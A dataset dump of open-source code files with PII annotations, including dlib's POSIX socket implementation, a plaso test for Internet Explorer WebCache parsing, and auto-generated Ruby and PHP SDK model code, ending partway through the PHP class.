content
stringlengths 66
45k
| language
stringclasses 11
values | license
stringclasses 14
values | path
stringlengths 20
176
| annotation_id
stringlengths 36
36
| pii
stringlengths 2
19.6k
| pii_modified
stringlengths 2
19.6k
|
---|---|---|---|---|---|---|
// Copyright (C) 2003 Davis E. King (davis@dlib.net), Miguel Grinberg
// License: Boost Software License See LICENSE.txt for the full license.
#ifndef DLIB_SOCKETS_KERNEL_2_CPp_
#define DLIB_SOCKETS_KERNEL_2_CPp_
#include "../platform.h"
#ifdef POSIX
#include "sockets_kernel_2.h"
#include <fcntl.h>
#include "../set.h"
#include <netinet/tcp.h>
#define SA_IN(sa) reinterpret_cast<sockaddr_in*>(&sa)
#define SA_IN6(sa) reinterpret_cast<sockaddr_in6*>(&sa)
namespace dlib
{
// ----------------------------------------------------------------------------------------
#ifdef HPUX
typedef int dsocklen_t;
#else
typedef socklen_t dsocklen_t;
#endif
// ----------------------------------------------------------------------------------------
// stuff to ensure that the signal SIGPIPE is ignored before any connections are made
// so that when a connection object is shutdown the program won't end on a broken pipe
namespace sockets_kernel_2_mutex
{
mutex startup_lock;
}
void sockets_startup()
{
// mutex crap to make this function thread safe
sockets_kernel_2_mutex::startup_lock.lock();
static bool init = false;
if (init == false)
{
init = true;
signal( SIGPIPE, SIG_IGN);
}
sockets_kernel_2_mutex::startup_lock.unlock();
}
// ----------------------------------------------------------------------------------------
// lookup functions
int
get_local_hostname (
std::string& hostname
)
{
try
{
char temp[MAXHOSTNAMELEN];
if (gethostname(temp,MAXHOSTNAMELEN) == -1)
{
return OTHER_ERROR;
}
// ensure that NUL is at the end of the string
temp[MAXHOSTNAMELEN-1] = '\0';
hostname = temp;
}
catch (...)
{
return OTHER_ERROR;
}
return 0;
}
// -----------------
// cygwin currently doesn't support the getaddrinfo stuff
#ifndef __CYGWIN__
int
hostname_to_ip (
const std::string& hostname,
std::string& ip,
int n
)
{
try
{
set<std::string>::kernel_1a sos;
if (hostname.empty())
return OTHER_ERROR;
addrinfo* result = 0;
if (getaddrinfo(hostname.c_str(),0,0,&result))
{
return OTHER_ERROR;
}
addrinfo* result_orig = result;
// loop over all the addrinfo structures and add them to the set. the reason for doing
// this dumb crap is because different platforms return all kinds of weird garbage. many
// return the same ip multiple times, etc.
while (result != 0)
{
char temp[16];
inet_ntop (
AF_INET,
&((reinterpret_cast<sockaddr_in*>(result->ai_addr))->sin_addr),
temp,16
);
result = result->ai_next;
ip.assign(temp);
if (sos.is_member(ip) == false)
sos.add(ip);
}
freeaddrinfo(result_orig);
// now return the nth unique ip address
int i = 0;
while (sos.move_next())
{
if (i == n)
{
ip = sos.element();
return 0;
}
++i;
}
return OTHER_ERROR;
}
catch (...)
{
return OTHER_ERROR;
}
return 0;
}
// -----------------
int
ip_to_hostname (
const std::string& ip,
std::string& hostname
)
{
try
{
if (ip.empty())
return OTHER_ERROR;
sockaddr_in sa;
sa.sin_family = AF_INET;
inet_pton(AF_INET,ip.c_str(),&sa.sin_addr);
char temp[NI_MAXHOST];
if ( getnameinfo (
reinterpret_cast<sockaddr*>(&sa),sizeof(sockaddr_in),
temp,
NI_MAXHOST,
0,
0,
NI_NAMEREQD
)
)
{
return OTHER_ERROR;
}
hostname.assign(temp);
}
catch (...)
{
return OTHER_ERROR;
}
return 0;
}
#else
int
hostname_to_ip (
const std::string& hostname,
std::string& ip,
int n
)
{
try
{
// lock this mutex since gethostbyname isn't really thread safe
auto_mutex M(sockets_kernel_2_mutex::startup_lock);
// if no hostname was given then return error
if ( hostname.empty())
return OTHER_ERROR;
hostent* address;
address = gethostbyname(hostname.c_str());
if (address == 0)
{
return OTHER_ERROR;
}
// find the nth address
in_addr* addr = reinterpret_cast<in_addr*>(address->h_addr_list[0]);
for (int i = 1; i <= n; ++i)
{
addr = reinterpret_cast<in_addr*>(address->h_addr_list[i]);
// if there is no nth address then return error
if (addr == 0)
return OTHER_ERROR;
}
char* resolved_ip = inet_ntoa(*addr);
// check if inet_ntoa returned an error
if (resolved_ip == NULL)
{
return OTHER_ERROR;
}
ip.assign(resolved_ip);
}
catch(...)
{
return OTHER_ERROR;
}
return 0;
}
// -----------------
int
ip_to_hostname (
const std::string& ip,
std::string& hostname
)
{
try
{
// lock this mutex since gethostbyaddr isn't really thread safe
auto_mutex M(sockets_kernel_2_mutex::startup_lock);
// if no ip was given then return error
if (ip.empty())
return OTHER_ERROR;
hostent* address;
unsigned long ipnum = inet_addr(ip.c_str());
// if inet_addr coudln't convert ip then return an error
if (ipnum == INADDR_NONE)
{
return OTHER_ERROR;
}
address = gethostbyaddr(reinterpret_cast<char*>(&ipnum),4,AF_INET);
// check if gethostbyaddr returned an error
if (address == 0)
{
return OTHER_ERROR;
}
hostname.assign(address->h_name);
}
catch (...)
{
return OTHER_ERROR;
}
return 0;
}
#endif // __CYGWIN__
// ----------------------------------------------------------------------------------------
connection::
connection(
int sock,
int foreign_port,
const std::string& foreign_ip,
int local_port,
const std::string& local_ip
) :
connection_socket(sock),
connection_foreign_port(foreign_port),
connection_foreign_ip(foreign_ip),
connection_local_port(local_port),
connection_local_ip(local_ip),
sd(false),
sdo(false),
sdr(0)
{}
// ----------------------------------------------------------------------------------------
int connection::
disable_nagle()
{
int flag = 1;
if(setsockopt( connection_socket, IPPROTO_TCP, TCP_NODELAY, (char *)&flag, sizeof(flag) ))
{
return OTHER_ERROR;
}
return 0;
}
// ----------------------------------------------------------------------------------------
long connection::
write (
const char* buf,
long num
)
{
const long old_num = num;
long status;
const long max_send_length = 1024*1024*100;
while (num > 0)
{
// Make sure to cap the max value num can take on so that if it is
// really large (it might be big on 64bit platforms) so that the OS
// can't possibly get upset about it being large.
const long length = std::min(max_send_length, num);
if ( (status = ::send(connection_socket,buf,length,0)) <=0)
{
// if send was interupted by a signal then restart it
if (errno == EINTR)
{
continue;
}
else
{
// check if shutdown or shutdown_outgoing have been called
if (sdo_called())
return SHUTDOWN;
else
return OTHER_ERROR;
}
}
num -= status;
buf += status;
}
return old_num;
}
// ----------------------------------------------------------------------------------------
long connection::
read (
char* buf,
long num
)
{
long status;
const long max_recv_length = 1024*1024*100;
while (true)
{
// Make sure to cap the max value num can take on so that if it is
// really large (it might be big on 64bit platforms) so that the OS
// can't possibly get upset about it being large.
const long length = std::min(max_recv_length, num);
status = recv(connection_socket,buf,length,0);
if (status == -1)
{
// if recv was interupted then try again
if (errno == EINTR)
continue;
else
{
if (sd_called())
return SHUTDOWN;
else
return OTHER_ERROR;
}
}
else if (status == 0 && sd_called())
{
return SHUTDOWN;
}
return status;
} // while (true)
}
// ----------------------------------------------------------------------------------------
long connection::
read (
char* buf,
long num,
unsigned long timeout
)
{
long status;
const long max_recv_length = 1024*1024*100;
if (readable(timeout) == false)
return TIMEOUT;
// Make sure to cap the max value num can take on so that if it is
// really large (it might be big on 64bit platforms) so that the OS
// can't possibly get upset about it being large.
const long length = std::min(max_recv_length, num);
status = recv(connection_socket,buf,length,0);
if (status == -1)
{
// if recv was interupted then call this a timeout
if (errno == EINTR)
{
return TIMEOUT;
}
else
{
if (sd_called())
return SHUTDOWN;
else
return OTHER_ERROR;
}
}
else if (status == 0 && sd_called())
{
return SHUTDOWN;
}
return status;
}
// IPV6 Helpers
static inline bool sockaddr_name(sockaddr_storage &sin, std::string &name)
{
void *addr;
if (sin.ss_family == AF_INET6)
addr = &(SA_IN6(sin)->sin6_addr);
else
addr = &(SA_IN(sin)->sin_addr);
char buffer[INET6_ADDRSTRLEN];
const char *temp = inet_ntop(sin.ss_family, addr, buffer, INET6_ADDRSTRLEN);
if (temp == NULL)
return false;
name.assign(temp);
return true;
}
static inline int sockaddr_port(sockaddr_storage &sin)
{
if (sin.ss_family == AF_INET6)
return ntohs(SA_IN6(sin)->sin6_port);
else
return ntohs(SA_IN(sin)->sin_port);
}
static inline void set_sockaddr_port(sockaddr_storage &sin, int port)
{
if (sin.ss_family == AF_INET6)
SA_IN6(sin)->sin6_port = htons(port);
else
SA_IN(sin)->sin_port = htons(port);
}
static inline sa_family_t sockaddr_family(const std::string &ip, dsocklen_t &len)
{
if (ip.empty() || ip.find(':') == std::string::npos)
{
len = sizeof(sockaddr_in);
return AF_INET;
}
else
{
len = sizeof(sockaddr_in6);
return AF_INET6;
}
}
static inline bool set_sockaddr_address(sockaddr_storage &sin, const std::string &ip)
{
void *addr;
if (sin.ss_family == AF_INET6)
addr = &(SA_IN6(sin)->sin6_addr);
else
addr = &(SA_IN(sin)->sin_addr);
if (inet_pton(sin.ss_family, ip.c_str(), addr) != 1)
return false;
return true;
}
static inline void sockaddr_inaddr_any(sockaddr_storage &sin)
{
if (sin.ss_family == AF_INET6)
memcpy(&SA_IN6(sin)->sin6_addr, &in6addr_any, sizeof(in6addr_any));
else
SA_IN(sin)->sin_addr.s_addr = htons(INADDR_ANY);
}
// ----------------------------------------------------------------------------------------
bool connection::
readable (
unsigned long timeout
) const
{
fd_set read_set;
// initialize read_set
FD_ZERO(&read_set);
// add the listening socket to read_set
FD_SET(connection_socket, &read_set);
// setup a timeval structure
timeval time_to_wait;
time_to_wait.tv_sec = static_cast<long>(timeout/1000);
time_to_wait.tv_usec = static_cast<long>((timeout%1000)*1000);
// wait on select
int status = select(connection_socket+1,&read_set,0,0,&time_to_wait);
// if select timed out or there was an error
if (status <= 0)
return false;
// socket is ready to be read
return true;
}
// ----------------------------------------------------------------------------------------
connection::
~connection (
)
{
while (true)
{
int status = ::close(connection_socket);
if (status == -1 && errno == EINTR)
continue;
break;
}
}
// ----------------------------------------------------------------------------------------
// ----------------------------------------------------------------------------------------
// listener object
// ----------------------------------------------------------------------------------------
// ----------------------------------------------------------------------------------------
listener::
listener(
int sock,
int port,
const std::string& ip
) :
listening_socket(sock),
listening_port(port),
listening_ip(ip),
inaddr_any(listening_ip.empty())
{}
// ----------------------------------------------------------------------------------------
listener::
~listener (
)
{
while (true)
{
int status = ::close(listening_socket);
if (status == -1 && errno == EINTR)
continue;
break;
}
}
// ----------------------------------------------------------------------------------------
int listener::
accept (
scoped_ptr<connection>& new_connection,
unsigned long timeout
)
{
new_connection.reset(0);
connection* con;
int status = this->accept(con, timeout);
if (status == 0)
new_connection.reset(con);
return status;
}
// ----------------------------------------------------------------------------------------
int listener::
accept (
connection*& new_connection,
unsigned long timeout
)
{
int incoming;
sockaddr_storage incomingAddr;
dsocklen_t length = sizeof(sockaddr_storage);
// implement timeout with select if timeout is > 0
if (timeout > 0)
{
fd_set read_set;
// initialize read_set
FD_ZERO(&read_set);
// add the listening socket to read_set
FD_SET(listening_socket, &read_set);
timeval time_to_wait;
// loop on select so if its interupted then we can start it again
while (true)
{
// setup a timeval structure
time_to_wait.tv_sec = static_cast<long>(timeout/1000);
time_to_wait.tv_usec = static_cast<long>((timeout%1000)*1000);
// wait on select
int status = select(listening_socket+1,&read_set,0,0,&time_to_wait);
// if select timed out
if (status == 0)
return TIMEOUT;
// if select returned an error
if (status == -1)
{
// if select was interupted or the connection was aborted
// then go back to select
if (errno == EINTR ||
errno == ECONNABORTED ||
#ifdef EPROTO
errno == EPROTO ||
#endif
errno == ECONNRESET
)
{
continue;
}
else
{
return OTHER_ERROR;
}
}
// accept the new connection
incoming=::accept (
listening_socket,
reinterpret_cast<sockaddr*>(&incomingAddr),
&length
);
// if there was an error return OTHER_ERROR
if ( incoming == -1 )
{
// if accept was interupted then go back to accept
if (errno == EINTR ||
errno == ECONNABORTED ||
#ifdef EPROTO
errno == EPROTO ||
#endif
errno == ECONNRESET
)
{
continue;
}
else
{
return OTHER_ERROR;
}
}
// if there were no errors then quit loop
break;
}
}
// else if there is no time out then just go into accept
else
{
while (true)
{
// call accept to get a new connection
incoming=::accept (
listening_socket,
reinterpret_cast<sockaddr*>(&incomingAddr),
&length
);
// if there was an error return OTHER_ERROR
if ( incoming == -1 )
{
// if accept was interupted then go back to accept
if (errno == EINTR ||
errno == ECONNABORTED ||
#ifdef EPROTO
errno == EPROTO ||
#endif
errno == ECONNRESET
)
{
continue;
}
else
{
return OTHER_ERROR;
}
}
break;
}
}
// get the port of the foreign host into foreign_port
int foreign_port = sockaddr_port(incomingAddr);
// get the IP of the foreign host into foreign_ip
std::string foreign_ip;
sockaddr_name(incomingAddr, foreign_ip);
// get the local ip for this connection into local_ip
std::string local_ip;
if (inaddr_any == true)
{
sockaddr_storage local_info;
length = sizeof(sockaddr_in);
// get the local sockaddr_in structure associated with this new connection
if ( getsockname (
incoming,
reinterpret_cast<sockaddr*>(&local_info),
&length
) == -1
)
{ // an error occurred
while (true)
{
int status = ::close(incoming);
if (status == -1 && errno == EINTR)
continue;
break;
}
return OTHER_ERROR;
}
sockaddr_name(local_info, local_ip);
}
else
{
local_ip = listening_ip;
}
// set the SO_OOBINLINE option
int flag_value = 1;
if (setsockopt(incoming,SOL_SOCKET,SO_OOBINLINE,reinterpret_cast<const void*>(&flag_value),sizeof(int)))
{
while (true)
{
int status = ::close(incoming);
if (status == -1 && errno == EINTR)
continue;
break;
}
return OTHER_ERROR;
}
// make a new connection object for this new connection
try
{
new_connection = new connection (
incoming,
foreign_port,
foreign_ip,
listening_port,
local_ip
);
}
catch (...)
{
while (true)
{
int status = ::close(incoming);
if (status == -1 && errno == EINTR)
continue;
break;
}
return OTHER_ERROR;
}
return 0;
}
// ----------------------------------------------------------------------------------------
// ----------------------------------------------------------------------------------------
// socket creation functions
// ----------------------------------------------------------------------------------------
// ----------------------------------------------------------------------------------------
static void
close_socket (
int sock
)
/*!
requires
- sock == a socket
ensures
- sock has been closed
!*/
{
while (true)
{
int status = ::close(sock);
if (status == -1 && errno == EINTR)
continue;
break;
}
}
// ----------------------------------------------------------------------------------------
int create_listener (
scoped_ptr<listener>& new_listener,
unsigned short port,
const std::string& ip
)
{
new_listener.reset();
listener* temp;
int status;
status = create_listener(temp,port,ip);
if (status == 0)
new_listener.reset(temp);
return status;
}
int create_listener (
listener*& new_listener,
unsigned short port,
const std::string& ip
)
{
sockets_startup();
sockaddr_storage sas;
memset(&sas, 0, sizeof(sockaddr_storage)); // Initialize sas
dsocklen_t length;
sas.ss_family = sockaddr_family(ip, length);
#ifdef __APPLE__
sas.ss_len = length;
#endif
int sock = socket (sas.ss_family, SOCK_STREAM, 0); // get a new socket
// if socket() returned an error then return OTHER_ERROR
if (sock == -1)
{
return OTHER_ERROR;
}
set_sockaddr_port(sas, port);
// set the local socket structure
if (ip.empty())
{
// if the listener should listen on any IP
sockaddr_inaddr_any(sas);
}
else
{
// if there is a specific ip to listen on
// if inet_addr couldn't convert the ip then return an error
if (!set_sockaddr_address(sas, ip))
{
close_socket(sock);
return OTHER_ERROR;
}
}
// set the SO_REUSEADDR option
int flag_value = 1;
if (setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,reinterpret_cast<const void*>(&flag_value),sizeof(int)))
{
close_socket(sock);
return OTHER_ERROR;
}
// bind the new socket to the requested port and ip
if (bind(sock,reinterpret_cast<sockaddr*>(&sas), length) == -1)
{ // if there was an error
close_socket(sock);
// if the port is already bound then return PORTINUSE
if (errno == EADDRINUSE)
return PORTINUSE;
else
return OTHER_ERROR;
}
// tell the new socket to listen
if ( listen(sock,SOMAXCONN) == -1)
{
// if there was an error return OTHER_ERROR
close_socket(sock);
// if the port is already bound then return PORTINUSE
if (errno == EADDRINUSE)
return PORTINUSE;
else
return OTHER_ERROR;
}
// determine the used local port if necessary
if (port == 0)
{
sockaddr_storage local_info;
if ( getsockname(
sock,
reinterpret_cast<sockaddr*>(&local_info),
&length
) == -1)
{
close_socket(sock);
return OTHER_ERROR;
}
port = sockaddr_port(local_info);
}
// initialize a listener object on the heap with the new socket
try { new_listener = new listener(sock,port,ip); }
catch(...) { close_socket(sock); return OTHER_ERROR; }
return 0;
}
// ----------------------------------------------------------------------------------------
int create_connection (
scoped_ptr<connection>& new_connection,
unsigned short foreign_port,
const std::string& foreign_ip,
unsigned short local_port,
const std::string& local_ip
)
{
new_connection.reset();
connection* temp;
int status = create_connection(temp,foreign_port, foreign_ip, local_port, local_ip);
if (status == 0)
new_connection.reset(temp);
return status;
}
int
create_connection (
connection*& new_connection,
unsigned short foreign_port,
const std::string& foreign_ip,
unsigned short local_port,
const std::string& local_ip
)
{
sockets_startup();
dsocklen_t length;
sa_family_t family = sockaddr_family(foreign_ip, length);
sockaddr_storage local_sa; // local socket structure
sockaddr_storage foreign_sa; // foreign socket structure
memset(&local_sa,'\0',sizeof(sockaddr_storage)); // initialize local_sa
memset(&foreign_sa,'\0',sizeof(sockaddr_storage)); // initialize foreign_sa
#ifdef __APPLE__
local_sa.ss_len = foreign_sa.ss_len = length;
#endif
int sock = socket (family, SOCK_STREAM, 0); // get a new socket
// if socket() returned an error then return OTHER_ERROR
if (sock == -1 )
{
return OTHER_ERROR;
}
// set up the local and foreign socket structure
local_sa.ss_family = family;
foreign_sa.ss_family = family;
set_sockaddr_port(foreign_sa, foreign_port);
set_sockaddr_port(local_sa, local_port);
if (!set_sockaddr_address(foreign_sa, foreign_ip))
{
close_socket(sock);
return OTHER_ERROR;
}
// set the local ip
if (local_ip.empty())
{
// if the listener should listen on any IP
sockaddr_inaddr_any(local_sa);
}
else
{
// if there is a specific ip to listen on
// if inet_addr couldn't convert the ip then return an error
if (!set_sockaddr_address(local_sa, local_ip))
{
close_socket(sock);
return OTHER_ERROR;
}
}
// bind the new socket to the requested local port and local ip
if ( bind(sock,reinterpret_cast<sockaddr*>(&local_sa), length) == -1)
{ // if there was an error
close_socket(sock);
// if the port is already bound then return PORTINUSE
if (errno == EADDRINUSE)
return PORTINUSE;
else
return OTHER_ERROR;
}
// connect the socket
if ( connect (
sock,
reinterpret_cast<sockaddr*>(&foreign_sa),
length
) == -1
)
{
close_socket(sock);
// if the port is already bound then return PORTINUSE
if (errno == EADDRINUSE)
return PORTINUSE;
else
return OTHER_ERROR;
}
// determine the local port and IP and store them in used_local_ip
// and used_local_port
int used_local_port = local_port;
std::string used_local_ip = local_ip;
sockaddr_storage local_info;
// determine the port
if (local_port == 0 || local_ip.empty())
{
length = sizeof(sockaddr_storage);
if ( getsockname(
sock,
reinterpret_cast<sockaddr*>(&local_info),
&length
) == -1)
{
close_socket(sock);
return OTHER_ERROR;
}
if (local_port == 0)
used_local_port = sockaddr_port(local_info);
if (local_ip.empty()) {
if (!sockaddr_name(local_info, used_local_ip))
{
close_socket(sock);
return OTHER_ERROR;
}
}
}
// set the SO_OOBINLINE option
int flag_value = 1;
if (setsockopt(sock,SOL_SOCKET,SO_OOBINLINE,reinterpret_cast<const void*>(&flag_value),sizeof(int)))
{
close_socket(sock);
return OTHER_ERROR;
}
// initialize a connection object on the heap with the new socket
try
{
new_connection = new connection (
sock,
foreign_port,
foreign_ip,
used_local_port,
used_local_ip
);
}
catch(...) {close_socket(sock); return OTHER_ERROR; }
return 0;
}
// ----------------------------------------------------------------------------------------
}
#endif // POSIX
#endif // DLIB_SOCKETS_KERNEL_2_CPp_
|
C++
|
Apache-2.0
|
JITbase/mtconnect-cppagent/lib/dlib/sockets/sockets_kernel_2.cpp
|
04f66c12-f51a-4f75-9206-5f67989b30a0
|
[{"tag": "EMAIL", "value": "davis@dlib.net", "start": 38, "end": 52, "context": "// Copyright (C) 2003 Davis E. King (davis@dlib.net), Miguel Grinberg\n// License: Boost Software Lice"}, {"tag": "NAME", "value": "Davis E. King", "start": 23, "end": 36, "context": "// Copyright (C) 2003 Davis E. King (davis@dlib.net), Miguel Grinberg\n// License: Boo"}, {"tag": "NAME", "value": "Miguel Grinberg", "start": 55, "end": 70, "context": "pyright (C) 2003 Davis E. King (davis@dlib.net), Miguel Grinberg\n// License: Boost Software License See LICENSE."}]
|
[{"tag": "EMAIL", "value": "davis@dlib.net", "start": 38, "end": 52, "context": "// Copyright (C) 2003 Davis E. King (davis@dlib.net), Miguel Grinberg\n// License: Boost Software Lice"}, {"tag": "NAME", "value": "Davis E. King", "start": 23, "end": 36, "context": "// Copyright (C) 2003 Davis E. King (davis@dlib.net), Miguel Grinberg\n// License: Boo"}, {"tag": "NAME", "value": "Miguel Grinberg", "start": 55, "end": 70, "context": "pyright (C) 2003 Davis E. King (davis@dlib.net), Miguel Grinberg\n// License: Boost Software License See LICENSE."}]
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""Tests for the Microsoft Internet Explorer WebCache database."""
import unittest
from plaso.lib import definitions
from plaso.parsers.esedb_plugins import msie_webcache
from tests.parsers.esedb_plugins import test_lib
class MsieWebCacheESEDBPluginTest(test_lib.ESEDBPluginTestCase):
"""Tests for the MSIE WebCache ESE database plugin."""
# pylint: disable=protected-access
def testConvertHeadersValues(self):
"""Tests the _ConvertHeadersValues function."""
plugin = msie_webcache.MsieWebCacheESEDBPlugin()
binary_value = (
b'HTTP/1.1 200 OK\r\nContent-Type: image/png\r\n'
b'X-Content-Type-Options: nosniff\r\nContent-Length: 2759\r\n'
b'X-XSS-Protection: 1; mode=block\r\n'
b'Alternate-Protocol: 80:quic\r\n\r\n')
expected_headers_value = (
'[HTTP/1.1 200 OK; Content-Type: image/png; '
'X-Content-Type-Options: nosniff; Content-Length: 2759; '
'X-XSS-Protection: 1; mode=block; '
'Alternate-Protocol: 80:quic]')
headers_value = plugin._ConvertHeadersValues(binary_value)
self.assertEqual(headers_value, expected_headers_value)
def testProcessOnDatabaseWithPartitionsTable(self):
"""Tests the Process function on database with a Partitions table."""
plugin = msie_webcache.MsieWebCacheESEDBPlugin()
storage_writer = self._ParseESEDBFileWithPlugin(['WebCacheV01.dat'], plugin)
self.assertEqual(storage_writer.number_of_events, 1372)
self.assertEqual(storage_writer.number_of_extraction_warnings, 0)
self.assertEqual(storage_writer.number_of_recovery_warnings, 0)
# The order in which ESEDBPlugin._GetRecordValues() generates events is
# nondeterministic hence we sort the events.
events = list(storage_writer.GetSortedEvents())
expected_event_values = {
'container_identifier': 1,
'data_type': 'msie:webcache:containers',
'date_time': '2014-05-12 07:30:25.4861987',
'directory': (
'C:\\Users\\test\\AppData\\Local\\Microsoft\\Windows\\'
'INetCache\\IE\\'),
'name': 'Content',
'set_identifier': 0,
'timestamp_desc': definitions.TIME_DESCRIPTION_LAST_ACCESS}
self.CheckEventValues(storage_writer, events[573], expected_event_values)
def testProcessOnDatabaseWithPartitionsExTable(self):
"""Tests the Process function on database with a PartitionsEx table."""
plugin = msie_webcache.MsieWebCacheESEDBPlugin()
storage_writer = self._ParseESEDBFileWithPlugin(
['PartitionsEx-WebCacheV01.dat'], plugin)
self.assertEqual(storage_writer.number_of_events, 4200)
self.assertEqual(storage_writer.number_of_extraction_warnings, 3)
self.assertEqual(storage_writer.number_of_recovery_warnings, 0)
# The order in which ESEDBPlugin._GetRecordValues() generates events is
# nondeterministic hence we sort the events.
events = list(storage_writer.GetSortedEvents())
expected_event_values = {
'access_count': 5,
'cache_identifier': 0,
'cached_file_size': 726,
'cached_filename': 'b83d57c0[1].svg',
'container_identifier': 14,
'data_type': 'msie:webcache:container',
'date_time': '2019-03-20 17:22:14.0000000',
'entry_identifier': 63,
'sync_count': 0,
'response_headers': (
'[HTTP/1.1 200; content-length: 726; content-type: image/svg+xml; '
'x-cache: TCP_HIT; x-msedge-ref: Ref A: 3CD5FCBC8EAD4E0A80FA41A62'
'FBC8CCC Ref B: PRAEDGE0910 Ref C: 2019-12-16T20:55:28Z; date: '
'Mon, 16 Dec 2019 20:55:28 GMT]'),
'timestamp_desc': definitions.TIME_DESCRIPTION_MODIFICATION,
'url': 'https://www.bing.com/rs/3R/kD/ic/878ca0cd/b83d57c0.svg'}
self.CheckEventValues(storage_writer, events[100], expected_event_values)
if __name__ == '__main__':
unittest.main()
|
Python
|
Apache-2.0
|
ColdSmoke627/plaso/tests/parsers/esedb_plugins/msie_webcache.py
|
2bf58674-eadf-464d-980d-8a843399c181
|
[]
|
[]
|
=begin
#Cisco Intersight
#Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. The Intersight OpenAPI document defines the complete set of properties that are returned in the HTTP response. From that perspective, a client can expect that no additional properties are returned, unless these properties are explicitly defined in the OpenAPI document. However, when a client uses an older version of the Intersight OpenAPI document, the server may send additional properties because the software is more recent than the client. In that case, the client may receive properties that it does not know about. Some generated SDKs perform a strict validation of the HTTP response body against the OpenAPI document. This document was created on 2021-10-20T11:22:53Z.
The version of the OpenAPI document: 1.0.9-4870
Contact: intersight@cisco.com
Generated by: https://openapi-generator.tech
OpenAPI Generator version: 5.3.1
=end
require 'spec_helper'
require 'json'
require 'date'
# Unit tests for IntersightClient::KubernetesConfigResultListAllOf
# Automatically generated by openapi-generator (https://openapi-generator.tech)
# Please update as you see appropriate
describe IntersightClient::KubernetesConfigResultListAllOf do
let(:instance) { IntersightClient::KubernetesConfigResultListAllOf.new }
describe 'test an instance of KubernetesConfigResultListAllOf' do
it 'should create an instance of KubernetesConfigResultListAllOf' do
expect(instance).to be_instance_of(IntersightClient::KubernetesConfigResultListAllOf)
end
end
describe 'test attribute "count"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
describe 'test attribute "results"' do
it 'should work' do
# assertion here. ref: https://www.relishapp.com/rspec/rspec-expectations/docs/built-in-matchers
end
end
end
|
Ruby
|
Apache-2.0
|
xlab-si/intersight-sdk-ruby/spec/models/kubernetes_config_result_list_all_of_spec.rb
|
68e540f7-1f5f-4e34-badd-1c96aea1d6ac
|
[{"tag": "EMAIL", "value": "intersight@cisco.com", "start": 1797, "end": 1817, "context": "sion of the OpenAPI document: 1.0.9-4870\nContact: intersight@cisco.com\nGenerated by: https://openapi-generator.tech\nOpen"}]
|
[{"tag": "EMAIL", "value": "intersight@cisco.com", "start": 1797, "end": 1817, "context": "sion of the OpenAPI document: 1.0.9-4870\nContact: intersight@cisco.com\nGenerated by: https://openapi-generator.tech\nOpen"}]
|
<?php
/**
* PickListItemModel
*
* PHP version 5
*
* @category Class
* @package FrankHouweling\AzureDevOpsClient\ProcessDefinitions
* @author Swagger Codegen team
* @link https://github.com/swagger-api/swagger-codegen
*/
/**
* WorkItemTracking
*
* No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
*
* OpenAPI spec version: 4.1-preview
* Contact: nugetvss@microsoft.com
* Generated by: https://github.com/swagger-api/swagger-codegen.git
* Swagger Codegen version: 2.4.11-SNAPSHOT
*/
/**
* NOTE: This class is auto generated by the swagger code generator program.
* https://github.com/swagger-api/swagger-codegen
* Do not edit the class manually.
*/
namespace FrankHouweling\AzureDevOpsClient\ProcessDefinitions\Model;
use \ArrayAccess;
use \FrankHouweling\AzureDevOpsClient\ProcessDefinitions\ObjectSerializer;
/**
* PickListItemModel Class Doc Comment
*
* @category Class
* @description
* @package FrankHouweling\AzureDevOpsClient\ProcessDefinitions
* @author Swagger Codegen team
* @link https://github.com/swagger-api/swagger-codegen
*/
class PickListItemModel implements ModelInterface, ArrayAccess
{
const DISCRIMINATOR = null;
/**
* The original name of the model.
*
* @var string
*/
protected static $swaggerModelName = 'PickListItemModel';
/**
* Array of property to type mappings. Used for (de)serialization
*
* @var string[]
*/
protected static $swaggerTypes = [
'id' => 'string',
'value' => 'string'
];
/**
* Array of property to format mappings. Used for (de)serialization
*
* @var string[]
*/
protected static $swaggerFormats = [
'id' => 'uuid',
'value' => null
];
/**
* Array of property to type mappings. Used for (de)serialization
*
* @return array
*/
public static function swaggerTypes()
{
return self::$swaggerTypes;
}
/**
* Array of property to format mappings. Used for (de)serialization
*
* @return array
*/
public static function swaggerFormats()
{
return self::$swaggerFormats;
}
/**
* Array of attributes where the key is the local name,
* and the value is the original name
*
* @var string[]
*/
protected static $attributeMap = [
'id' => 'id',
'value' => 'value'
];
/**
* Array of attributes to setter functions (for deserialization of responses)
*
* @var string[]
*/
protected static $setters = [
'id' => 'setId',
'value' => 'setValue'
];
/**
* Array of attributes to getter functions (for serialization of requests)
*
* @var string[]
*/
protected static $getters = [
'id' => 'getId',
'value' => 'getValue'
];
/**
* Array of attributes where the key is the local name,
* and the value is the original name
*
* @return array
*/
public static function attributeMap()
{
return self::$attributeMap;
}
/**
* Array of attributes to setter functions (for deserialization of responses)
*
* @return array
*/
public static function setters()
{
return self::$setters;
}
/**
* Array of attributes to getter functions (for serialization of requests)
*
* @return array
*/
public static function getters()
{
return self::$getters;
}
/**
* The original name of the model.
*
* @return string
*/
public function getModelName()
{
return self::$swaggerModelName;
}
/**
* Associative array for storing property values
*
* @var mixed[]
*/
protected $container = [];
/**
* Constructor
*
* @param mixed[] $data Associated array of property values
* initializing the model
*/
public function __construct(array $data = null)
{
$this->container['id'] = isset($data['id']) ? $data['id'] : null;
$this->container['value'] = isset($data['value']) ? $data['value'] : null;
}
/**
* Show all the invalid properties with reasons.
*
* @return array invalid properties with reasons
*/
public function listInvalidProperties()
{
$invalidProperties = [];
return $invalidProperties;
}
/**
* Validate all the properties in the model
* return true if all passed
*
* @return bool True if all properties are valid
*/
public function valid()
{
return count($this->listInvalidProperties()) === 0;
}
/**
* Gets id
*
* @return string
*/
public function getId()
{
return $this->container['id'];
}
/**
* Sets id
*
* @param string $id id
*
* @return $this
*/
public function setId($id)
{
$this->container['id'] = $id;
return $this;
}
/**
* Gets value
*
* @return string
*/
public function getValue()
{
